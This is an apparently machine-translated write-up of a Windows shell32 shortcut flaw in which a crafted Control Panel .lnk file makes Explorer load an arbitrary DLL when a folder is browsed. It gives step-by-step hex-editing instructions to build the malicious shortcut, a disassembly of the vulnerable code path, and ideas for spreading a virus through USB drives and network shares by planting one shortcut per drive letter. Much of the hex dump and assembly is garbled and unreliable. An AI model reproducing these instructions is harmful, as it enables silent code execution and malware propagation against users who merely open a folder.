How to exploit lnk shortcuts

Preface
Windows shell32 has a vulnerability in processing the shortcut files of the control panel program. It can load any DLL files on the hard disk and execute any code.

Vulnerability file generation
Under "Control Panel", right-click "display" and click "create shortcut" to create the shortcut on the desktop. Then, use winhex on the desktop to open the "display. lnk" file.

Offset 0 1 2 3 4 5 6 7 8 9 a B c d e f00000000 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 l ...... .....?.. 00000010 00 00 00 46 81 00 00 00 00 00 00 00 00... f ?.......... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040 00 00 00 00 00 00 00 00 00 00 CC 00 14 00 ............?.. 00000050 1f 50 E0 4f D0 20 EA 3A 69 10 A2 D8 08 00 2B 30. P ?? I. Large... + 000000060 30 9d 14 00 2E 00 20 20 EC 21 EA 3A 69 10 A2 dd 0 ?... ?? I. ⑤ 00000070 08 00 2B 30 30 9d A2 00 00 00 9C FF 00 00 00... + 00 then ...? .. 00000080 00 00 00 6a 00 00 00 00 00 00 1D 00 20 00 44 00... J ......... d.00000090 3A 00 5C 00 57 00 49 00 4E 00 44 00 4f 00 57 00 :. /. w. i. n. d. o. 20171000000a0 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 s. /. s. y. s. t. e. m.20.00b0 33 00 32 00 5C 00 64 00 65 00 73 00 6B 00 2E 00 3.2. /. d. e. s. k... 201700c0 63 00 70 00 6C 00 00 00 3E 66 3A 79 00 F4 66 C. p. l...> f: Y .. 20171000000d0 39 65 A8 60 84 76 4C 68 6 2 97 84 76 16 59 C2 89 9e 1_lhb 1_v. y000000e0 0C FF 8B 4f 82 59 CC 80 6f 66 01 30 4f 5C 55 5E. O 00000000of0000o/u ^ 000000f0 dd 4f A4 62 0b 7A 8f 5E 01 30 9C 98 72 82 01 30 bytes. Z branch. 0 branch R? 000000100 57 5B 53 4f 27 59 0f 5C 8C 54 4f 5C 55 5E 06 52 W [So 'Y./o/u ^. r00000110 A8 8f 87 73 02 30 00 00 00 00 00 00 00 00 Jun. 0 ........ change the 9C FF at the offset 7A to 00 00 00, and change the file name D:/Windows/system32/desk. cpl changed to C:/DLL. DLL (unicode format ). Save the file. Copy this file to any directory. When you browse this directory, the C:/DLL. dll file will be loaded. Lnk file formatThe target file of Lnk is stored in the shitemid structure of the shell item ID list. This structure represents a target by layer. In the above lnk file, the first layer is 14 00 ............?.. 00000050 1f 50 E0 4f D0 20 EA 3A 69 10 A2 D8 08 00 2B 30. P ?? I. Large... + 000000060 30 9d14 00 represents the length. The 16 bytes behind it are the guid of "My Computer" {20d04fe0-3aea-1069-a2d8-08002b30309d}, which can be found in the registry. The second layer is 14 00 2E 00 20 EC 21 EA 3A 69 10 A2 dd 0 ?... ?? I. ⑤ 00000070 08 00 2B 30 30 9d this is the guid of "Control Panel" {21ec2020-3aea-1069-a2dd-08002b30309d }. The third layer is the target file whose length is 0xa2. The 9C FF at 0x7a offset indicates the index of the shortcut icon. It seems like this. Therefore, the shell item ID list points to the following files: My computer> Control Panel> D:/Windows/system32/desk. Cpl. The shortcut for common files seems to be: My computer> drive letter> directory 1> directory 2... -> File name. Where vulnerabilities are generatedShell32 should display its icons when processing the lnk file. For general files, it should be parsed from the icon filename string, however, the control panel shortcut without the icon filename String Structure after the file is parsed directly from iconindex in 0x7a. When the iconindex is 0, the CPL file will be loaded and the cplapplet interface will be called. This will cause the issue of executing the code in the DLL. 7d716064 53 push ebx7d716065 ff75 10 push dword ptr [EBP + 10] 7d716068 8d5e 0C Lea EBX, dword ptr [ESI + C] 7d71606b 53 push ebx7d71606c ff75 0C push dword ptr [EBP + C]; C:/DLL. DLL, 0, <-This 0 is the iconindex7d71606f ff15 0015597d call dword ptr obtained from the offset 7A [<& kernel32.lstrcpynw>; kernel32.lstrcpynw7d716075 6a 2C push 2c7d716077 ff75 0C push dword ptr [EBP + C] 7d71607a ff15 f41b597d call dword ptr [<& shlwapi. strchrw>]; shlwapi. strchrw7d716080 85c0 test eax, eax7d716082 74 5d je short 7d7160e17d716084 66: 8320 00 and word PTR [eax], 07d716088 83c0 02 add eax, 27d71608b 50 push eax7d71608c ff15 641c597d call dword ptr [<& shlwapi. strtointw>]; shlwapi. strtointw7d7160928b7d 14 mov EDI, dword ptr [EBP + 14] 7d716095 8907 mov dword ptr [EDI], eax7d716097 8b45 18 mov eax, dword ptr [EBP + 18] 7d71609a C700 02000000 mov dword ptr [eax], 27d7160a0 8b0f mov ECx, dword ptr [EDI] 7d7160a2 33d2 XOR edX, 20173bca CMP ECx, EDX; the offset 0x7a must be 0 before loadlibary7d7160a6 75 33 jnz short 7d7160db7d7160a8 C700 1a000000 mov dword ptr [eax], 1a7d7160ae 8d86 14020000 Lea eax, dword ptr [ESI + 214] 7d7160b4 3910 cmp dword ptr [eax], edx7d7160b6 8955 0C mov dword ptr [EBP + C], edx7d7160b9 75 16 jnz short limit 8d4d 0C Lea ECx, dword ptr [EBP + C] 7d7160be 51 push ecx7d7160bf 8d8e 18020000 Lea ECx, dword ptr [ESI + 218] 7d7160c5 51 push limit 50 push limit 53 push limit E8 48c4f2ff call 7d6%15; call 7d63866d ff15 6415597d call dword ptr [<& kernel32.getcurrent>; kernel32.getcurrentprocessid7d6000073 50 push eax7d638674 56 push esi7d6000075 68 00001000 push 100000; unicode "f1df_6.0.2600.5512_x-ww_35d4ce83/" 7d63867a 8985 e4fdffff mov dword ptr [ebp-21C], eax7d610880 ff15 6815597d call dword ptr [<& kernel32.openproces>; ipv3bc6 CMP eax, listen 8985 e8fdffff mov dword ptr [ebp-218], %0f84 e5000000 je %8d85 f4fdffff Lea eax, dword ptr [ebp-20C] %50 Push Pull ff15 a41c597d call dword ptr [<& shlwapi. pathfileexi>; shlwapi. pathfileexistsw7d6da-a1 85c0 test eax, eax7d6108a3 c785 bcfdffff 2> mov dword ptr [ebp-244], 207d6366ad 74 14 je short rj8d85 f4fdffff Lea eax, dword ptr [ebp-20C] 7d6rjb5 89b5 c0fdffff mov dword ptr [ebp-240], esi7d6366bb 8985 c4fdffff mov dword ptr [ebp-23C], export EB 1A JMP short export c785 c0fdffff 0> mov dword ptr [ebp-240], 87d6108cd 899d c4fdffff mov dword ptr [ebp-23C], ebx7d6jwd3 c785 d0fdffff 7> mov dword ptr [ebp-230] 7b7d6jwdd 8d85 bcfdffff Lea eax, dword ptr [ebp-244] 7d60000e3 50 push eax7d6jwe4 ff15 6c15597d call dword ptr [<& kernel32.createactc>; 10983ff CMP eax, -17d6109ed 8985 f0fdffff mov dword ptr [ebp-210], 12775 06 jnz short 10989b5 f0fdffff mov dword ptr [ebp-210], 4158b3d 8c15597d mov EDI, dword ptr [<& kernel32.activ>; 20178d85 ecfdffff Lea eax, dword ptr [ebp-214] 7d638707 50 push pull ffb5 f0fdffff push dword ptr [ebp-210] 7d63870e ffd7 call edi7d638710 33f6 xor esi, esi7d638712 46 Inc pull 56 Push Pull 56 push esi7d638715 56 push esi7d638716 53 push ebx7d638717 ff15 00f0787d call dword ptr [7d78f000]; apphelp. export 85c0 test eax, eax7d63871f 75 08 jnz short release 2185 e0fdffff and dword ptr [ebp-220], eax7d638727 EB 0d JMP short 7d63871_d638729 53 push EBX; load dll7d63872a ff15 a015597d call dword ptr [<& kernel32.loadlibrar>; kernel32.loadlibraryw7d638730 8985 e0fdffff mov dword ptr [ebp-220], eax; dll.01c00000 ExploitationIt is said that the virus sample was transmitted through the USB flash drive. However, I found that DLL loading must be an absolute path, but the relative path cannot be used, then the virus must know the drive letter of the USB flash drive to load the DLL on the USB flash drive. I don't know how to solve this problem? I did not carefully study the lnk file format. I don't know if I can put multiple target addresses. I can only think of a very stupid way to create more than 20. lnk files on the USB flash drive during infection. One drive letter corresponds to one, which can always overwrite the drive letter where the USB flash drive is located. In addition, using shared directories for propagation also has the same problem. In fact, I think this is not a real vulnerability, because since the icons need to be parsed, loading the corresponding DLL file is also justified, and it happens to be exploited by viruses.